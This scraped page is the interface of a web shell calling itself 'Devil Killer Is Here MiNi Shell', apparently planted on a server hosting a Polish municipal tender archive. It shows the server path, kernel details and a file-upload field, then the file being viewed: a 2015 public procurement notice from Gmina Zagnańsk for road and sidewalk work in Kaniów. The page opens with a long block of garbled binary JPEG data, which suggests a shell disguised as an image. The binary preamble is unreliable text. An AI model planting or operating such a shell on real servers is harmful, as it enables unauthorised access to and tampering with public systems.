JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150217/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150217/21447-N-2015.html

<p class="kh_header"><b>Zagnańsk: Rozbudowa drogi i budowa chodnika w pasie drogi gminnej ul. Dębowa 
w msc. Kaniów, gm. Zagnańsk w ramach Narodowego Programu Przebudowy Dróg Lokalnych - Etap II. Bezpieczeństwo - Dostępność - Rozwój</b><br>
<b>Numer ogłoszenia: 21447 - 2015; data zamieszczenia: 17.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zagnańsk , ul. Spacerowa 8, 26-050 Zagnańsk, woj. świętokrzyskie, tel. 41 3001322, faks 41 3001373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zagnansk.biuletyn.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa drogi i budowa chodnika w pasie drogi gminnej ul. Dębowa 
w msc. Kaniów, gm. Zagnańsk w ramach Narodowego Programu Przebudowy Dróg Lokalnych - Etap II. Bezpieczeństwo - Dostępność - Rozwój.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 - ROZBUDOWA  DROGI  I BUDOWA CHODNIKA W PASIE DROGI GMINNEJ NA UL. DĘBOWEJ W MSC KANIÓW

1.  Branża drogowa

1.1. rozbudowa drogi od skrzyżowania z drogą powiatową Nr 0303T na długości ok., 
        125,55m, w tym poszerzenie istniejącej jezdni do szerokości 5m,
1.2.  demontaż istniejącego chodnika z płyt betonowych,
1.3. wykonanie chodnika o szerokości 2m, z kostki betonowej wibroprasowanej grubości 8cm koloru czerwonego  o pow. ok. 310 m2, 
1.4.  wykonanie zjazdów na posesje z betonowej kostki prasowanej grubości 8cm koloru 
        szarego, 
1.5. wykonanie rozbiórki drewnianego niezamieszkałego budynku zlokalizowanego 
        w pasie drogowym kolidującego z projektowaną linią teletechniczną oraz 
        projektowanym gazociągiem,
1.6.  wycinka drzew kolidujących z rozbudową drogi wraz z karczowaniem krzaków,
1.7.  wykonanie oznakowania pionowego i poziomego:
        a) dostawa i montaż elektronicznej sygnalizacji ostrzegawczej solarnej na jednym 
            wysięgniku (dwustronnej) - 1szt. Po stronie Wykonawcy opracowanie 
            dokumentacji, uzyskanie uzgodnień, pozwolenia na budowę lub zgłoszenia, 
            załatwienie czynności formalno prawnych dot. funkcjonowania urządzenia 
            (lokalizacja zostanie ustalona z  Zamawiającym),
       b) dostawa i montaż progu zwalniającego (montaż w uzgodnieniu z Zamawiającym),
       c) pozostałe oznakowanie  zgodnie z dokumentacją projektowo - wykonawczą.
1.8. przeniesienie krzyża znajdującego się przy skrzyżowaniu ul. Dębowej z drogą 
        powiatową Nr 0303T. Po stronie Wykonawcy należy uzyskanie załatwienie 
        wszelkich formalności prawnych związanych z uzyskaniem niezbędnej 
        dokumentacji celem wykonania przedmiotowych prac zgodnie z przepisami ustawy 
        Prawo Budowlane oraz wyłożenie terenu w obrębie krzyża kostką betonową koloru 
        czerwonego o powierzchni około 20 m2


2.   Branża gazowa

2.1. wykonanie przebudowy gazociągu średniego ciśnienia z rur dn 63x5,8mm PE100 
       SDR 11 o długości 121 m, 
2.2. wykonanie przebudowy przyłącza gazowego średniego ciśnienia z rur dn 25x3mm 
        PE100  o długości 10,5m.

3.   Branża sanitarna- kanalizacja deszczowa

3.1.  wykonanie kanału deszczowego z rur PVC-U O 315 o długości 123m, 
3.2   wykonanie przykanalików od wpustów z rur PVC-U O 200 o łącznej długości 8m,
3.3.  studzienki kanalizacyjne O 600 - 4 szt.,
3.4.  wpust uliczny - 4 szt.,
3.5.  wlot O 300 z rowu do kanału z osadnikiem - 1szt.

4.   Branża elektryczna

Przebudowa napowietrznej linii nn kolidującej z budową ulicy

4.1. przeniesienie całości istniejącej linii od słupa Nr 27 do słupa Nr 29-1 (trzy przęsła)
       na wschodnią stronę ul. Dębowej,
4.2. wykonanie przyłączy napowietrznych izolowanych do budynków mieszkalnych,
4.3. montaż oświetlenia na słupach przebudowanej linii.

5.   Branża teletechniczna

Przebudowa infrastruktury telekomunikacyjnej kolidującej z przebudową drogi

5.1. demontaż starej linii
5.2. budowa słupa SŻT- 8,5       - 2 szt.
5.3. budowa słupa 2xSŻT- 8,5   - 3 szt.
5.4.podwieszenie kabli miedzianych XzTKMXpwn 25x4x0,6 o długości 148 mb
        km/par -  7,4

6. Roboty wykończeniowe 

a) zagospodarowanie terenu urządzeniami małej architektury (ławeczki - 3 szt., stojaki na rowery - 1 szt., kosze na śmieci - 3 szt.),
b) montaż tablicy informacyjnej o wym. 0,7m x 0,9 m - 1 szt.,
Montaż  i wykonanie  zgodnie z przedmiarem robót.
c) montaż barier ochronnych o dł. 75 mb, oraz poręczy o dł. 6mb.
d) zasadzenie drzew gatunku dąb wraz z ich zabezpieczeniem przed złamaniem (sposób zabezpieczenia: Należy przywiązać pień drzewa do palików wbitych w ziemię. W zależności od wielkości drzewa i jego ustabilizowania w podłożu należy użyć 3 palików, wbitych w podłoże pod lekkim kątem, tak aby były jak najdalej od bryły korzeniowej. Do palików pień drzewa należy przywiązać parcianą taśmą grubości około 3 cm (aby zminimalizować otarcia pnia od taśmy). 
   
Uwaga: pozostały zakres prac określony jest w dokumentacji budowlano wykonawczej oraz w przedmiarze robót, który jest elementem pomocniczym. Rysunki i część opisowa są dokumentami wzajemnie się uzupełniającymi. Wszystkie elementy ujęte w opisie, a nie ujęte na rysunkach lub ujęte na rysunkach a nie w opisie należy traktować tak, jakby były ujęte w obu  przypadkach.


ZADANIE NR 2 -  PRZEBUDOWA DROGI I BUDOWA CHODNIKA W PASIE DROGI POWIATOWEJ NR 0303T W MSC KANIÓW

1. Branża drogowa

1.1. Wykonanie remontu skrzyżowania drogi powiatowej Nr 0303T z drogą gminną przy 
       ul. Dębowej  w msc Kaniów,
	1.2. Wykonanie prac rozbiórkowych starej nawierzchni wraz z istniejącą infrastrukturą - 
       frezowanie nawierzchni bitumicznej o gr. średnio 8cm w ilości ok. 310m2,
	1.3. Wykonanie odbudowy związanej z przebudową sieci ok. 60m2,
	1.4. Wykonanie nowej jezdni o powierzchni ok. 450m2,
	1.5. Wykonanie zjazdów do posesji z kostki betonowej koloru szarego o powierzchni
       ok. 20m2,
	1.6.Wykonanie chodników z kostki betonowej koloru czerwonego o powierzchni 
      ok. 160m2,.
	1.7.Wykonanie drogi dojazdowej wraz z zawrotką dla samochodów osobowych 
      o powierzchni  ok. 312 m2,
	1.8. Wykonanie oznakowania pionowego i poziomego, 
	1.9. Wykonanie oczyszczenia (udrożnienia) istniejącego rowu na dł. 380 mb wraz
       z włączeniem do  studni D4. Włączenia należy  dokonać na wysokości dz. ozn. nr 
       ewid. 265 (zgodnie z zakresem prac  pokazanym na załączniku nr 8a) poprzez  
       zamontowanie przyczółka o średnicy ok. 50 cm. Oczyszczony rów przed  
       włączeniem  na długości  3 mb umocnić płytami ażurowymi.

2. Branża gazowa

2.1. Przebudowa gazociągu średniego ciśnienia z rur PE dn 63mm - odcinki A-H i E-F

3. Branża sanitarna - budowa kanalizacji deszczowej w tym m.in.:

3.1. studzienki kanalizacyjne o600 mm - 4 szt.
3.2. wpusty uliczne - 3 szt. 
3.3. wykonanie przebudowy przyłączy wodociągowych

4. Branża elektryczna - dobudowa oświetlenia ulicznego w tym m.in.:

4.1. montaż i stawianie słupa linii napowietrznej nn, 
4.2. montaż opraw oświetlenia ulicznego.   


Pozostały zakres prac określony jest w dokumentacji budowlano wykonawczej oraz w przedmiarze robót, który jest elementem pomocniczym. Rysunki i część opisowa są dokumentami wzajemnie się uzupełniającymi. Wszystkie elementy ujęte w opisie, a nie ujęte na rysunkach lub ujęte na rysunkach a nie w opisie należy traktować tak, jakby były ujęte w obu  przypadkach..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, przewidywany  
jest w zakresie robót budowlanych ujętych w punkcie 3 SIWZ - przedmiot zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.11.00-9, 45.23.31.21-3, 45.23.31.20-6, 45.23.32.00-1, 45.23.60.00-0, 45.23.32.90-8, 45.23.10.00-5, 45.23.12.21-0, 45.33.30.00-0, 45.23.13.00-8, 45.31.00.00-3, 45.31.61.00-6, 45.23.14.00-9, 45.23.23.00-5, 45.23.23.10-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od  wykonawców wniesienia  wadium w wysokości 12.000zł.
( słownie: dwanaście tysięcy złotych 00/100).
Wadium należy  wnieść  przed upływem terminu składania ofert, który  Zamawiający  określił następująco: do dnia 4 marca 2015 r. do godz. 1030
Wadium musi obejmować okres  związania  ofertą, który  rozpoczyna  się  wraz z  upływem terminu  składania  ofert i określony został  w pkt.9 SIWZ, gdyż  stanowi  zabezpieczenie  złożonej  przez  wykonawcę oferty.

Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędno- ściowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem  pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach  ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o  których  mowa w  art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu  Polskiej  Agencji  Rozwoju  przedsiębiorczości ( Dz. U. z 200 7 r. nr 42,poz. 275 ze zm.).

Wadium wnoszone  w pieniądzu należy wpłacić przelewem na rachunek  Zamawiającego: BS Samsonów nr konta : 58 8512 0002 2001 0000 0143 0005 z adnotacją: Rozbudowa drogi i budowa chodnika w pasie drogi gminnej ul. Dębowa w msc. Kaniów, gm. Zagnańsk. 
  

W przypadku wnoszenia przez Wykonawcę wadium w formie  pieniądza do oferty należy  załączyć dowód przelewu wadium na rachunek  bankowy Zamawiającego. 
W przypadku składania dowodu, kopia  ta musi  być  potwierdzona za zgodność 
z oryginałem przez wykonawcę.
Do oferty należy załączyć kopię przedmiotowego dokumentu wadialnego potwierdzoną za zgodność  z oryginałem przez Wykonawcę.

Za skuteczne wniesione wadium w pieniądzu, uważa się wadium znajdujące się w dniu 4 marca 2015 r. do godz. 1030 na rachunku Zamawiającego. 
W przypadku uchybienia temu terminowi Zamawiający uzna, że wadium nie zostało  skutecznie wniesione.

Zwrot wadium:
Zamawiający zwraca niezwłocznie wadium w terminach i zasadach określonych 
w art. 46 ust. 1-2 ustawy p.z.p.

Wadium wniesione  w pieniądzu Zamawiający przechowuje na rachunku bankowym. Wadium wniesione w pieniądzu, Zamawiający zwraca wraz z odsetkami wynikającymi z umowy rachunku  bankowego, na którym było  ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.

Ponowne wniesienie wadium:
      Zamawiający  żąda  ponownego wniesienia wadium przez wykonawcę przypadku 
      i na zasadach określonych w art. 46 ust.3 ustawy p.z.p.

     Zatrzymanie wadium:
     Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca 
     w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 ustawy p.z.p.,
     z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, 
     o których mowa w art. 25 ust.1, pełnomocnictw, list podmiotów należących do tej 
     samej grupy  kapitałowej, lub  nie wyraził zgody na  poprawienie  omyłki, o  której  
     mowa  w art. 87 ust.2 pkt 3, co powodowało brak możliwości wybrania oferty 
     złożonej przez  wykonawcę jako najkorzystniejszej ( art.46 ust. 4a ustawy p.z.p.).

    Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego   
     oferta została wybrana:
     1) odmówił podpisania umowy w sprawie  zamówienia publicznego na warunkach 
       określonych w ofercie;
     2)  nie wniósł wymaganego  zabezpieczenia należytego wykonania umowy;
     3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
           z przyczyn leżących po stronie wykonawcy.

      Zgodnie z dyspozycją art. 24 ust. 2 pkt 2 ustawy p.z.p. z postępowania o udzielenie    
      zamówienia wyklucza się wykonawców, którzy nie wnieśli wadium do upływu 
      terminu składania ofert, na przedłużony okres  związania  ofertą lub w terminie, o 
      którym  mowa a art. 46 ust.3 ustawy p.z.p., albo nie  zgodzili się  na przedłużenie  
      okresu związania ofertą. Ofertę wykonawcy wykluczonego uznaje się  za odrzuconą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy posiadają uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
Zamawiający żąda  złożenia  następujących  oświadczeń i dokumentów:
         aktualnego odpisu z właściwego rejestru lub centralnej ewidencji  i informacji 
            o działalności gospodarczej, jeżeli odrębne przepisy wymagają  wpisu do 
            rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w 
            oparciu o art. 24 ust.1 pkt 2 ustawy p.z.p., wystawionego nie wcześniej   
            niż  6 miesięcy przed upływem terminu składania wniosków o dopuszczenie
          do  udziału w postępowaniu o udzielenie  zamówienia albo składania ofert

      b) aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego 
            potwierdzającego, że wykonawca nie zalega z opłaceniem podatków, lub 
            zaświadczenia, że  uzyskał przewidziane  prawem zwolnienie, odroczenie lub 
            rozłożenie na raty zaległych płatności lub  wstrzymanie w całości wykonania  
            decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące 
            przed upływem terminu składania wniosków o dopuszczenie do udziału w 
            postępowaniu o udzielenie  zamówienia albo składania ofert;

      c) aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń 
            Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego 
            potwierdzającego, że wykonawca nie zalega z  opłacaniem składek na  
            ubezpieczenia zdrowotne i społeczne, lub potwierdzenia, że uzyskał 
            przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty  
            zaległych płatności lub wstrzymanie w całości wykonania  decyzji właściwego 
            organu - wystawionego nie wcześniej niż  3 miesiące przed upływem terminu 
            składania  wniosków o dopuszczenie do udziału w postępowaniu o udzielenie   
            zamówienia  albo składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy wykażą, że wykonali 
w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę  budowlaną związaną  z przedmiotem zamówienia. 

Za roboty budowlane związane z przedmiotem zamówienia uznaje się roboty budowlane  polegające na budowie  drogi publicznej, których zakres  obejmował  wykonanie co najmniej jednej budowy drogi  o długości minimum 0,5 km, wartości nie mniejszej niż 500 000,00 złotych brutto, wraz z budową i przebudową  urządzeń  infrastruktury technicznej. 
Zamawiający żąda  złożenia  następujących  oświadczeń i dokumentów:
wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed 
upływem terminu składania ofert, a jeżeli okres prowadzenia działalności  jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania wraz z załączeniem dowodów dotyczących   najważniejszych robót, określających czy roboty te zostały wykonane  w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w postępowaniu mogą wziąć udział wykonawcy, którzy w celu wykonania 
 zamówienia wykażą dysponowanie (tzn. będą dysponowali na czas 
 wykonania zamówienia, tj. prowadzenia robót objętych przedmiotem 
   niniejszego zamówienia) potencjałem technicznym.
Zamawiający żąda  złożenia  następujących  oświadczeń i dokumentów:
wykaz narzędzi, wyposażenia zakładu  i urządzeń technicznych dostępnych  
wykonawcy robót budowlanych w celu wykonania zamówienia wraz  z  informacją o  podstawie  do dysponowania  tymi zasobami;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy w celu wykonania   zamówienia wykażą dysponowanie ( tzn. będą dysponowali na czas wykonania  zamówienia, tj. prowadzenia robót objętych przedmiotem niniejszego zamówienia) osobami  zdolnymi do wykonania zamówienia, tj. dysponowanie- kierownikiem budowy posiadającym uprawnienia budowlane  do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno - budowlanej lub konstrukcyjno -inżynieryjnej 
- kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej;
Kierownik budowy może jednocześnie pełnić funkcję kierownika
     	robót drogowych 
 - kierownikiem robót branży sanitarnej obejmującej: kanalizację deszczową,
 sieć gazową , wodociągową, 
  -  kierownikiem robót branży teletechnicznej ,
 -  kierownikiem robót branży elektrycznej,  
 - uprawnionym geodetą posiadającym  uprawnienia zawodowe w zakresie   
 geodezyjnych pomiarów sytuacyjno - wysokościowych, realizacyjnych 
             i inwentaryzacyjnych;Zamawiający żąda  złożenia  następujących  oświadczeń i dokumentów:
wykaz osób, które będą  uczestniczyć w wykonywaniu zamówienia w szczególności  odpowiedzialnych  za kierowanie  robotami  budowlanymi,wraz z  informacjami  na temat ich kwalifikacji zawodowych,zakrsu wykonywanych robót niezbędnych do  wykonania  zamówienia, a  także zakresu  
          wykonywanych przez nie czynności oraz informacją o podstawie  
         do  dysponowania tymi osobami;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu  mogą  wziąć udział wykonawcy, którzy są ubezpieczeni  
 od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej
w wysokości  nie mniejszej niż 500 000,00 zł,
Przedłożą informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej
potwierdzająca wysokość posiadanych środków finansowych lub zdolności  kredytowej Wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem
terminu składania ofert .Wykonawca musi posiadać nie mniej niż 500.000,00 złotych własnych środków lub zdolność kredytową w tej samej wysokości</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
